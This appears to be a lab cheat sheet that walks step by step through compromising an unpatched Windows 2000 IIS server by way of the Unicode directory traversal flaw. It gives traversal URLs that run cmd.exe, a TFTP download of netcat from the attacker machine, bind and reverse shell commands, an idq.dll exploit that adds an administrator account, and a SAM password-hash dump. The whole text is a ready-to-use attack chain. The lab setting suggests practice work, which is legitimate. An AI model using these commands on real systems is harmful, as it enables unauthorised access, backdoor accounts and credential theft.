http://www.securityfocus.com/bid/1806/

Lab:
Victim:    192.168.0.235 (unpatched Windows 2000 server)
Attacker:  192.168.0.212 (XP SP1)


-------------- Gain CMD access to do commands

http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\

http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe

http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\inetpub\scripts

http://192.168.0.235/scripts/cmd1.exe?/c+dir

http://192.168.0.235/scripts/cmd1.exe?/c+dir+c:\

http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../whoami.exe?

-------------- Hack - see secret file in root


http://192.168.0.235/scripts/cmd1.exe?/c+type+c:\secret.txt

http://192.168.0.235/scripts/cmd1.exe?/c+echo+%20-%20Nice%20to%20Know!%20/Hacker+>>+c:\secret.txt

-------------- Hack - TFTP

http://192.168.0.235/scripts/cmd1.exe?/c+tftp%20-i%20192.168.0.212%20get%20nc.exe%20c:\inetpub\scripts\nc.exe

Call shell (connect to server):

http://192.168.0.235/scripts/cmd1.exe?/c+nc -l -p 53 -t -e cmd.exe

c:\tftp-root\nc.exe 192.168.0.235 53

Reverse shell (server connects out):

c:\tftp-root\nc.exe -l -p 80

http://192.168.0.235/scripts/cmd1.exe?/c+nc.exe -v -e cmd.exe 192.168.0.212 80

-------------- Escalate priviliges

tftp -i 192.168.0.212 get idq.dll c:\inetpub\scripts\idq.dll

C:\TFTP-Root\ispc.exe 192.168.0.235/scripts/idq.dll 80

-------------- Add user

http://192.168.0.235/scripts/idq.dll

Hacked dll creates new user on server - User/pass: "iisuser/abcd1234" added to victim server as member of administrator group!

net use \\192.168.0.235\c$ "abcd1234" /U:"iisuser"

-------------- Grab SAM

net use \\192.168.0.235\admin$ "abcd1234" /U:"iisuser"

c:\TFTP-Root\pwdump3e\pwdump3e \\192.168.0.235 c:\samdump.txt

-------------- EOF -------------